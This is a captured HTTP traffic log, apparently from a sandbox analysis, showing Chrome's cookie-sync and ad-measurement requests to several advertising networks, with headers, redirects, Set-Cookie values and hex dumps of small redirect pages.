                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC809OUTGET /match/47/?remote_uid=CAESEA_YaeSFRZgNp7ugVZyanQk&c_param1=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA&gdpr=%%GDPR%%&addtl_consent=%%ADDTL_CONSENT%%&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: s.uuidksinc.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC432INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Server: nginx/1.23.2
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=kadam&google_push=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA
                                                                                                                                                                                                                                                                                                                      Set-Cookie: jcsuuid=MiXMLVme0oV7RCZ5G9dN; expires=Fri, 31 Oct 2025 18:19:34 GMT; domain=uuidksinc.net; path=/; secure; SameSite=None


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      45192.168.2.44986954.88.211.524437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC776OUTGET /sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: sync.srv.stackadapt.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1439INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC2lI-5BjABOgT87-jmQgQyb9xk.y4TibvAkV3R6LKOBLJBhIEqD8bPb1GV1ZUP5Rp5Noxg; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC2lI-5BjABOgT87-jmQgQyb9xk.y4TibvAkV3R6LKOBLJBhIEqD8bPb1GV1ZUP5Rp5Noxg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Content-Length: 244
                                                                                                                                                                                                                                                                                                                      Connection: Close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC244INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 73 74 61 63 6b 61 64 61 70 74 5f 75 73 64 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 68 6d 3d 5f 79 68 66 38 6e 38 76 58 6e 6c 34 36 51 42 6f 4e 64 62 34 38 4b 33 2d 2d 6b 30 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 79 49 38 46 32 31 2d 57 67 39 2d 43 6c 56 5f 47 4d 63 53 4b 53 2d 4a 45 64 4b 38 65 30 68 4e 6b 4e 70 55 78 72 4d 5f 39 5f 4b 54 45 4a 67 5f 6d 47 75 71 4c 45 47 39 33 44 43 65 31 4d 78 4e 63 62 31 59 47 38 7a 67 67 61 30 30 76 59 67 53 32 71 73 77 45 64 77 7a 32 6e 5a 36 49 62 64 77 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&amp;google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&amp;google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw">Found</a>.


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      46192.168.2.44985535.204.158.494437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC762OUTGET /gp_match?google_gid=CAESEEQQDa5m7sjciSE7Ndvm-Qs&google_cver=1&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: um.simpli.fi
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC1034INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                      Content-Length: 142
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: suid=39F8AD7435EC43369D67DAA35699A1F7; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:34 GMT; SameSite=none; Secure;
                                                                                                                                                                                                                                                                                                                      Set-Cookie: suid_legacy=39F8AD7435EC43369D67DAA35699A1F7; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:34 GMT; Secure;
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=39F8AD7435EC43369D67DAA35699A1F7&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8
                                                                                                                                                                                                                                                                                                                      Expires: Wed, 30 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC142INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      47192.168.2.44986854.170.20.2054437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC772OUTGET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.prod.bidr.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC534INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      location: https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&_bee_ppp=1
                                                                                                                                                                                                                                                                                                                      Server: gunicorn
                                                                                                                                                                                                                                                                                                                      set-cookie: checkForPermission=ok; Domain=bidr.io; expires=Thu, 31 Oct 2024 18:29:35 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: Close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      48192.168.2.44988254.88.211.524437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC778OUTGET /sync?nid=154&google_gid=CAESEOhl-PvFg9cy4oKnILke398&google_cver=1&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: sync.srv.stackadapt.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC1449INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC3lI-5BjABOgT87-jmQgRtA-Bs.zcykn1TgoqQWGnGECt3%2FG7%2BIt8vHDNo0wSWyrwyqUqY; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC3lI-5BjABOgT87-jmQgRtA-Bs.zcykn1TgoqQWGnGECt3%2FG7%2BIt8vHDNo0wSWyrwyqUqY; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Content-Length: 246
                                                                                                                                                                                                                                                                                                                      Connection: Close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC246INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 73 74 61 63 6b 61 64 61 70 74 5f 75 73 64 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 68 6d 3d 5f 79 68 66 38 6e 38 76 58 6e 6c 34 36 51 42 6f 4e 64 62 34 38 4b 33 2d 2d 6b 30 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 74 64 43 62 2d 4d 76 49 6f 4c 59 47 30 42 4c 73 4d 34 49 6d 43 70 6f 52 72 78 4b 71 41 62 44 54 41 49 4a 56 35 58 32 57 4b 6d 42 48 46 39 36 51 54 6b 44 4c 57 34 5f 39 72 55 5f 63 56 41 61 39 50 6c 56 6c 37 4a 53 5f 77 35 49 46 6d 4a 76 43 4d 6b 5f 39 45 51 4a 46 76 32 6e 2d 48 4c 76 70 5f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&amp;google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&amp;google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_">Found</a>.


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      49192.168.2.449877172.217.18.44437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC798OUTGET /pagead/drt/ui HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                      Referer: https://googleads.g.doubleclick.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC426INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Location: https://googleads.g.doubleclick.net/pagead/drt/si?st=NO_DATA
                                                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      50192.168.2.449876172.217.18.44437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC804OUTGET /ads/measurement/l?ebcid=ALh7CaR80l8t9U7n9gXPOfu3w6UyLAl3cik-0i5KBcl3_ssI2Gtx2spmIdHhFx9UzfMiFWCsz14vmro9J-xO4PKboOMcIXp8MA HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://googleads.g.doubleclick.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC314INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Server: jumble_frontend_server
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      51192.168.2.4499008.2.111.1364437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC827OUTGET /sync?id=10&google_gid=CAESEMDhonF9Btdu1XWfNJz5fhA&google_cver=1&google_push=AXcoOmSVgF44yqfpd96VbFVh_KjAPRPC4Ai_8ZtMMIn9azfRglCI6xaLv6qNovrTM_6iJz8pWP9tCIBnejjHjsYUA-2q3qq8sZJAfaeuHw HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: sync2-dsp.e-volution.ai
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
